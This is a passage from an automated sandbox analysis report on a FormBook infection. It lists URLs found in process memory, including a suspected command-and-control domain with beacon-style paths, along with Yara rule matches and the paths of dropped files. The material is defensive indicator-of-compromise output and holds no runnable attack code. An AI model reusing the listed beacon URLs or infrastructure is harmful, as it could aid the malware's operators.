          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.walmart.com/favicon.ico
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/10_Best_Mutual_Funds.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evK
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/Best_Penny_Stocks.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evKe18
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/Credit_Card_Application.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/Healthy_Weight_Loss.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evKe
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/High_Speed_Internet.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evKe
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/Parental_Control.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evKe18O
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/__media__/js/trademark.php?d=wrn23internetradio.com&type=mng
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/display.cfm
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/find_a_tutor.cfm?fp=65F8RB7i3x%2FsEwmlkD1BcfX4pXeqlmp94evKe18OP4OT
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/m5gz/?_XL000=kjyTHG7M5
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/px.js?ch=1
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/px.js?ch=2
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: http://www.wrn23internetradio.com/sk-logabpstatus.php?a=Sy9UZkRVNnM1d05sVmpSaTQwbEFrQzlrWXhWdGdtMGl1
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://z.about.com/m/a08.ico
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmp: String found in binary or memory: https://www.networksolutions.com/cgi-bin/promo/domain-search?domainNames=wrn23internetradio.com&sear

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.1539075288.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000019.00000002.1537258723.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.1542910573.0000000003290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.1330562113.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1280189026.0000000004A67000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.1330269509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000019.00000002.1539944232.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000017.00000002.1540880092.00000000049B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 1.2.REQUERIDA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.REQUERIDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 25.2.user7n7plnxh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 25.2.user7n7plnxh.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\cmd.exe: Dropped file: C:\Users\user\AppData\Roaming\KP994Q-A\KP9logri.ini
          Source: C:\Windows\SysWOW64\cmd.exe: Dropped file: C:\Users\user\AppData\Roaming\KP994Q-A\KP9logrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1539075288.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1539075288.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.1537258723.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.1537258723.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1542910573.0000000003290000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1542910573.0000000003290000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1330562113.0000000000C60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1330562113.0000000000C60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1280189026.0000000004A67000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1280189026.0000000004A67000.00000004.00000001.sdmp,